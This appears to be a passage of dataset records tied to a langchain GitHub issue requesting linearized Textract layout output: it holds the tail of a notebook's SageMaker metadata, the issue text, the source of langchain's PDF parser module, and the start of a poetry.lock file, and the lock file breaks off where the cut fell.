"memoryGiB": 4, "name": "ml.t3.medium", "vcpuNum": 2 }, { "_defaultOrder": 1, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.t3.large", "vcpuNum": 2 }, { "_defaultOrder": 2, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.t3.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 3, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.t3.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 4, "_isFastLaunch": true, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.m5.large", "vcpuNum": 2 }, { "_defaultOrder": 5, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.m5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 6, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.m5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 7, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.m5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 8, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.m5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 9, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.m5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 10, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.m5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 11, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.m5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 12, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.m5d.large", "vcpuNum": 2 }, { "_defaultOrder": 13, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.m5d.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 14, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.m5d.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 15, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.m5d.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 16, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.m5d.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 17, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.m5d.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 18, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.m5d.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 19, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.m5d.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 20, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": true, 
"memoryGiB": 0, "name": "ml.geospatial.interactive", "supportedImageNames": [ "sagemaker-geospatial-v1-0" ], "vcpuNum": 0 }, { "_defaultOrder": 21, "_isFastLaunch": true, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 4, "name": "ml.c5.large", "vcpuNum": 2 }, { "_defaultOrder": 22, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.c5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 23, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.c5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 24, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.c5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 25, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 72, "name": "ml.c5.9xlarge", "vcpuNum": 36 }, { "_defaultOrder": 26, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 96, "name": "ml.c5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 27, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 144, "name": "ml.c5.18xlarge", "vcpuNum": 72 }, { "_defaultOrder": 28, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.c5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 29, "_isFastLaunch": true, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.g4dn.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 30, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.g4dn.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 31, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.g4dn.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 32, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.g4dn.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 33, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.g4dn.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 34, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.g4dn.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 35, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 61, "name": "ml.p3.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 36, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 244, "name": "ml.p3.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 37, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 488, "name": "ml.p3.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 38, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.p3dn.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 39, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 
16, "name": "ml.r5.large", "vcpuNum": 2 }, { "_defaultOrder": 40, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.r5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 41, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.r5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 42, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.r5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 43, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.r5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 44, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.r5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 45, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 512, "name": "ml.r5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 46, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.r5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 47, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.g5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 48, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.g5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 49, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.g5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 50, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.g5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 51, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.g5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 52, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.g5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 53, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.g5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 54, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.g5.48xlarge", "vcpuNum": 192 }, { "_defaultOrder": 55, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 1152, "name": "ml.p4d.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 56, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 1152, "name": "ml.p4de.24xlarge", "vcpuNum": 96 } ], "instance_type": "ml.t3.medium", "kernelspec": { "display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.11.1" } }, "nbformat": 4, 
"nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies layout elements such as tables, lists, figures, text paragraphs, and titles. The AmazonTextractPDFParser should use this to generate a linearized output that improves downstream LLM accuracy with those hints. When features like LAYOUT, TABLES, and FORMS are passed to the Textract call, the text output should render tables and key/value pairs, put multi-column text in reading order, and prefix list items with a *. ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/langchain/document_loaders/parsers/pdf.py
"""Module contains common parsers for PDFs.""" from __future__ import annotations import warnings from typing import ( TYPE_CHECKING, Any, Iterable, Iterator, Mapping, Optional, Sequence, Union, ) from urllib.parse import urlparse import numpy as np from langchain.document_loaders.base import BaseBlobParser from langchain.document_loaders.blob_loaders import Blob from langchain.schema import Document if TYPE_CHECKING: import fitz.fitz import pdfminer.layout import pdfplumber.page import pypdf._page import pypdfium2._helpers.page _PDF_FILTER_WITH_LOSS = ["DCTDecode", "DCT", "JPXDecode"] _PDF_FILTER_WITHOUT_LOSS = [ "LZWDecode", "LZW", "FlateDecode", "Fl", "ASCII85Decode", "A85", "ASCIIHexDecode", "AHx", "RunLengthDecode", "RL", "CCITTFaxDecode", "CCF", "JBIG2Decode", ] def extract_from_images_with_rapidocr( images: Sequence[Union[Iterable[np.ndarray], bytes]] ) -> str: """Extract text from images with RapidOCR. Args: images: Images to extract text from. Returns: Text extracted from images. Raises: ImportError: If `rapidocr-onnxruntime` package is not installed. """ try: from rapidocr_onnxruntime import RapidOCR except ImportError: raise ImportError( "`rapidocr-onnxruntime` package not found, please install it with " "`pip install rapidocr-onnxruntime`" ) ocr = RapidOCR() text = "" for img in images: result, _ = ocr(img) if result: result = [text[1] for text in result] text += "\n".join(result) return text class PyPDFParser(BaseBlobParser): """Load `PDF` using `pypdf`""" def __init__( self, password: Optional[Union[str, bytes]] = None, extract_images: bool = False ): self.password = password self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pypdf with blob.as_bytes_io() as pdf_file_obj: pdf_reader = pypdf.PdfReader(pdf_file_obj, password=self.password) yield from [ Document( page_content=page.extract_text() + self._extract_images_from_page(page), metadata={"source": blob.source, "page": page_number}, ) for page_number, page in enumerate(pdf_reader.pages) ] def _extract_images_from_page(self, page: pypdf._page.PageObject) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images or "/XObject" not in page["/Resources"].keys(): return "" xObject = page["/Resources"]["/XObject"].get_object() images = [] for obj in xObject: if xObject[obj]["/Subtype"] == "/Image": if xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITHOUT_LOSS: height, width = xObject[obj]["/Height"], xObject[obj]["/Width"] images.append( np.frombuffer(xObject[obj].get_data(), dtype=np.uint8).reshape( height, width, -1 ) ) elif xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITH_LOSS: images.append(xObject[obj].get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class PDFMinerParser(BaseBlobParser): """Parse `PDF` using `PDFMiner`.""" def __init__(self, extract_images: bool = False): self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" if not self.extract_images: from pdfminer.high_level import extract_text with blob.as_bytes_io() as pdf_file_obj: text = extract_text(pdf_file_obj) metadata = {"source": blob.source} yield Document(page_content=text, metadata=metadata) else: import io from pdfminer.converter import PDFPageAggregator, TextConverter from pdfminer.layout import LAParams from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager from pdfminer.pdfpage import PDFPage text_io = 
io.StringIO() with blob.as_bytes_io() as pdf_file_obj: pages = PDFPage.get_pages(pdf_file_obj) rsrcmgr = PDFResourceManager() device_for_text = TextConverter(rsrcmgr, text_io, laparams=LAParams()) device_for_image = PDFPageAggregator(rsrcmgr, laparams=LAParams()) interpreter_for_text = PDFPageInterpreter(rsrcmgr, device_for_text) interpreter_for_image = PDFPageInterpreter(rsrcmgr, device_for_image) for i, page in enumerate(pages): interpreter_for_text.process_page(page) interpreter_for_image.process_page(page) content = text_io.getvalue() + self._extract_images_from_page( device_for_image.get_result() ) text_io.truncate(0) text_io.seek(0) metadata = {"source": blob.source, "page": str(i)} yield Document(page_content=content, metadata=metadata) def _extract_images_from_page(self, page: pdfminer.layout.LTPage) -> str: """Extract images from page and get the text with RapidOCR.""" import pdfminer def get_image(layout_object: Any) -> Any: if isinstance(layout_object, pdfminer.layout.LTImage): return layout_object if isinstance(layout_object, pdfminer.layout.LTContainer): for child in layout_object: return get_image(child) else: return None images = [] for img in list(filter(bool, map(get_image, page))): if img.stream["Filter"].name in _PDF_FILTER_WITHOUT_LOSS: images.append( np.frombuffer(img.stream.get_data(), dtype=np.uint8).reshape( img.stream["Height"], img.stream["Width"], -1 ) ) elif img.stream["Filter"].name in _PDF_FILTER_WITH_LOSS: images.append(img.stream.get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class PyMuPDFParser(BaseBlobParser): """Parse `PDF` using `PyMuPDF`.""" def __init__( self, text_kwargs: Optional[Mapping[str, Any]] = None, extract_images: bool = False, ) -> None: """Initialize the parser. Args: text_kwargs: Keyword arguments to pass to ``fitz.Page.get_text()``. """ self.text_kwargs = text_kwargs or {} self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import fitz with blob.as_bytes_io() as file_path: doc = fitz.open(file_path) # open document yield from [ Document( page_content=page.get_text(**self.text_kwargs) + self._extract_images_from_page(doc, page), metadata=dict( { "source": blob.source, "file_path": blob.source, "page": page.number, "total_pages": len(doc), }, **{ k: doc.metadata[k] for k in doc.metadata if type(doc.metadata[k]) in [str, int] }, ), ) for page in doc ] def _extract_images_from_page( self, doc: fitz.fitz.Document, page: fitz.fitz.Page ) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" import fitz img_list = page.get_images() imgs = [] for img in img_list: xref = img[0] pix = fitz.Pixmap(doc, xref) imgs.append( np.frombuffer(pix.samples, dtype=np.uint8).reshape( pix.height, pix.width, -1 ) ) return extract_from_images_with_rapidocr(imgs) class PyPDFium2Parser(BaseBlobParser): """Parse `PDF` with `PyPDFium2`.""" def __init__(self, extract_images: bool = False) -> None: """Initialize the parser.""" try: import pypdfium2 # noqa:F401 except ImportError: raise ImportError( "pypdfium2 package not found, please install it with" " `pip install pypdfium2`" ) self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pypdfium2 # pypdfium2 is really finicky with respect to closing things, # if done incorrectly creates seg faults. 
with blob.as_bytes_io() as file_path: pdf_reader = pypdfium2.PdfDocument(file_path, autoclose=True) try: for page_number, page in enumerate(pdf_reader): text_page = page.get_textpage() content = text_page.get_text_range() text_page.close() content += "\n" + self._extract_images_from_page(page) page.close() metadata = {"source": blob.source, "page": page_number} yield Document(page_content=content, metadata=metadata) finally: pdf_reader.close() def _extract_images_from_page(self, page: pypdfium2._helpers.page.PdfPage) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" import pypdfium2.raw as pdfium_c images = list(page.get_objects(filter=(pdfium_c.FPDF_PAGEOBJ_IMAGE,))) images = list(map(lambda x: x.get_bitmap().to_numpy(), images)) return extract_from_images_with_rapidocr(images) class PDFPlumberParser(BaseBlobParser): """Parse `PDF` with `PDFPlumber`.""" def __init__( self, text_kwargs: Optional[Mapping[str, Any]] = None, dedupe: bool = False, extract_images: bool = False, ) -> None: """Initialize the parser. Args: text_kwargs: Keyword arguments to pass to ``pdfplumber.Page.extract_text()`` dedupe: Avoiding the error of duplicate characters if `dedupe=True`. """ self.text_kwargs = text_kwargs or {} self.dedupe = dedupe self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pdfplumber with blob.as_bytes_io() as file_path: doc = pdfplumber.open(file_path) # open document yield from [ Document( page_content=self._process_page_content(page) + "\n" + self._extract_images_from_page(page), metadata=dict( { "source": blob.source, "file_path": blob.source, "page": page.page_number - 1, "total_pages": len(doc.pages), }, **{ k: doc.metadata[k] for k in doc.metadata if type(doc.metadata[k]) in [str, int] }, ), ) for page in doc.pages ] def _process_page_content(self, page: pdfplumber.page.Page) -> str: """Process the page content based on dedupe.""" if self.dedupe: return page.dedupe_chars().extract_text(**self.text_kwargs) return page.extract_text(**self.text_kwargs) def _extract_images_from_page(self, page: pdfplumber.page.Page) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" images = [] for img in page.images: if img["stream"]["Filter"].name in _PDF_FILTER_WITHOUT_LOSS: images.append( np.frombuffer(img["stream"].get_data(), dtype=np.uint8).reshape( img["stream"]["Height"], img["stream"]["Width"], -1 ) ) elif img["stream"]["Filter"].name in _PDF_FILTER_WITH_LOSS: images.append(img["stream"].get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class AmazonTextractPDFParser(BaseBlobParser): """Send `PDF` files to `Amazon Textract` and parse them. For parsing multi-page PDFs, they have to reside on S3. """ def __init__( self, textract_features: Optional[Sequence[int]] = None, client: Optional[Any] = None, ) -> None: """Initializes the parser. Args: textract_features: Features to be used for extraction, each feature should be passed as an int that conforms to the enum `Textract_Features`, see `amazon-textract-caller` pkg client: boto3 textract client """ try: import textractcaller as tc self.tc = tc if textract_features is not None: self.textract_features = [ tc.Textract_Features(f) for f in textract_features ] else: self.textract_features = [] except ImportError: raise ImportError( "Could not import amazon-textract-caller python package. 
" "Please install it with `pip install amazon-textract-caller`." ) if not client: try: import boto3 self.boto3_textract_client = boto3.client("textract") except ImportError: raise ImportError( "Could not import boto3 python package. " "Please install it with `pip install boto3`." ) else: self.boto3_textract_client = client def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Iterates over the Blob pages and returns an Iterator with a Document for each page, like the other parsers If multi-page document, blob.path has to be set to the S3 URI and for single page docs the blob.data is taken """ url_parse_result = urlparse(str(blob.path)) if blob.path else None # Either call with S3 path (multi-page) or with bytes (single-page) if ( url_parse_result and url_parse_result.scheme == "s3" and url_parse_result.netloc ): textract_response_json = self.tc.call_textract( input_document=str(blob.path), features=self.textract_features, boto3_textract_client=self.boto3_textract_client, ) else: textract_response_json = self.tc.call_textract( input_document=blob.as_bytes(), features=self.textract_features, call_mode=self.tc.Textract_Call_Mode.FORCE_SYNC, boto3_textract_client=self.boto3_textract_client, ) current_text = "" current_page = 1 for block in textract_response_json["Blocks"]: if "Page" in block and not (int(block["Page"]) == current_page): yield Document( page_content=current_text, metadata={"source": blob.source, "page": current_page}, ) current_text = "" current_page = int(block["Page"]) if "Text" in block: current_text += block["Text"] + " " yield Document( page_content=current_text, metadata={"source": blob.source, "page": current_page}, ) class DocumentIntelligenceParser(BaseBlobParser): """Loads a PDF with Azure Document Intelligence (formerly Forms Recognizer) and chunks at character level.""" def __init__(self, client: Any, model: str): self.client = client self.model = model def _generate_docs(self, blob: Blob, result: Any) -> Iterator[Document]: for p in result.pages: content = " ".join([line.content for line in p.lines]) d = Document( page_content=content, metadata={ "source": blob.source, "page": p.page_number, }, ) yield d def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" with blob.as_bytes_io() as file_obj: poller = self.client.begin_analyze_document(self.model, file_obj) result = poller.result() docs = self._generate_docs(blob, result) yield from docs
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies layout elements such as tables, lists, figures, text paragraphs, and titles. The AmazonTextractPDFParser should use this to generate a linearized output that improves downstream LLM accuracy with those hints. When features like LAYOUT, TABLES, and FORMS are passed to the Textract call, the text output should render tables and key/value pairs, put multi-column text in reading order, and prefix list items with a *. ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/poetry.lock
# This file is automatically @generated by Poetry 1.6.1 and should not be changed by hand. [[package]] name = "absl-py" version = "2.0.0" description = "Abseil Python Common Libraries, see https://github.com/abseil/abseil-py." optional = true python-versions = ">=3.7" files = [ {file = "absl-py-2.0.0.tar.gz", hash = "sha256:d9690211c5fcfefcdd1a45470ac2b5c5acd45241c3af71eed96bc5441746c0d5"}, {file = "absl_py-2.0.0-py3-none-any.whl", hash = "sha256:9a28abb62774ae4e8edbe2dd4c49ffcd45a6a848952a5eccc6a49f3f0fc1e2f3"}, ] [[package]] name = "aioboto3" version = "12.0.0" description = "Async boto3 wrapper" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "aioboto3-12.0.0-py3-none-any.whl", hash = "sha256:23895e734f83e34827a38d3a08ccc3f4178cc8d4e3a7b7031a0cbf8efc875555"}, {file = "aioboto3-12.0.0.tar.gz", hash = "sha256:c2bbb990b4efd2e474a1e8a42a80291faf6434b2dc8678f163208d338b2dba39"}, ] [package.dependencies] aiobotocore = {version = "2.7.0", extras = ["boto3"]} [package.extras] chalice = ["chalice (>=1.24.0)"] s3cse = ["cryptography (>=2.3.1)"] [[package]] name = "aiobotocore" version = "2.7.0" description = "Async client for aws services using botocore and aiohttp" optional = true python-versions = ">=3.8" files = [ {file = "aiobotocore-2.7.0-py3-none-any.whl", hash = "sha256:aec605df77ce4635a0479b50fd849aa6b640900f7b295021ecca192e1140e551"}, {file = "aiobotocore-2.7.0.tar.gz", hash = "sha256:506591374cc0aee1bdf0ebe290560424a24af176dfe2ea7057fe1df97c4f0467"}, ] [package.dependencies] aiohttp = ">=3.7.4.post0,<4.0.0" aioitertools = ">=0.5.1,<1.0.0" boto3 = {version = ">=1.28.16,<1.28.65", optional = true, markers = "extra == \"boto3\""} botocore = ">=1.31.16,<1.31.65" wrapt = ">=1.10.10,<2.0.0" [package.extras] awscli = ["awscli (>=1.29.16,<1.29.65)"] boto3 = ["boto3 (>=1.28.16,<1.28.65)"] [[package]] name = "aiodns" version = "3.1.1" description = "Simple DNS resolver for asyncio" optional = true python-versions = "*" files = [ {file = "aiodns-3.1.1-py3-none-any.whl", hash = "sha256:a387b63da4ced6aad35b1dda2d09620ad608a1c7c0fb71efa07ebb4cd511928d"}, {file = "aiodns-3.1.1.tar.gz", hash = "sha256:1073eac48185f7a4150cad7f96a5192d6911f12b4fb894de80a088508c9b3a99"}, ] [package.dependencies] pycares = ">=4.0.0" [[package]] name = "aiofiles" version = "23.2.1" description = "File support for asyncio." 
optional = true python-versions = ">=3.7" files = [ {file = "aiofiles-23.2.1-py3-none-any.whl", hash = "sha256:19297512c647d4b27a2cf7c34caa7e405c0d60b5560618a29a9fe027b18b0107"}, {file = "aiofiles-23.2.1.tar.gz", hash = "sha256:84ec2218d8419404abcb9f0c02df3f34c6e0a68ed41072acfb1cef5cbc29051a"}, ] [[package]] name = "aiohttp" version = "3.8.6" description = "Async http client/server framework (asyncio)" optional = false python-versions = ">=3.6" files = [ {file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:41d55fc043954cddbbd82503d9cc3f4814a40bcef30b3569bc7b5e34130718c1"}, {file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1d84166673694841d8953f0a8d0c90e1087739d24632fe86b1a08819168b4566"}, {file = "aiohttp-3.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:253bf92b744b3170eb4c4ca2fa58f9c4b87aeb1df42f71d4e78815e6e8b73c9e"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3fd194939b1f764d6bb05490987bfe104287bbf51b8d862261ccf66f48fb4096"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6c5f938d199a6fdbdc10bbb9447496561c3a9a565b43be564648d81e1102ac22"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2817b2f66ca82ee699acd90e05c95e79bbf1dc986abb62b61ec8aaf851e81c93"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0fa375b3d34e71ccccf172cab401cd94a72de7a8cc01847a7b3386204093bb47"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9de50a199b7710fa2904be5a4a9b51af587ab24c8e540a7243ab737b45844543"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e1d8cb0b56b3587c5c01de3bf2f600f186da7e7b5f7353d1bf26a8ddca57f965"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8e31e9db1bee8b4f407b77fd2507337a0a80665ad7b6c749d08df595d88f1cf5"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:7bc88fc494b1f0311d67f29fee6fd636606f4697e8cc793a2d912ac5b19aa38d"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ec00c3305788e04bf6d29d42e504560e159ccaf0be30c09203b468a6c1ccd3b2"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_x86_64.whl", hash = 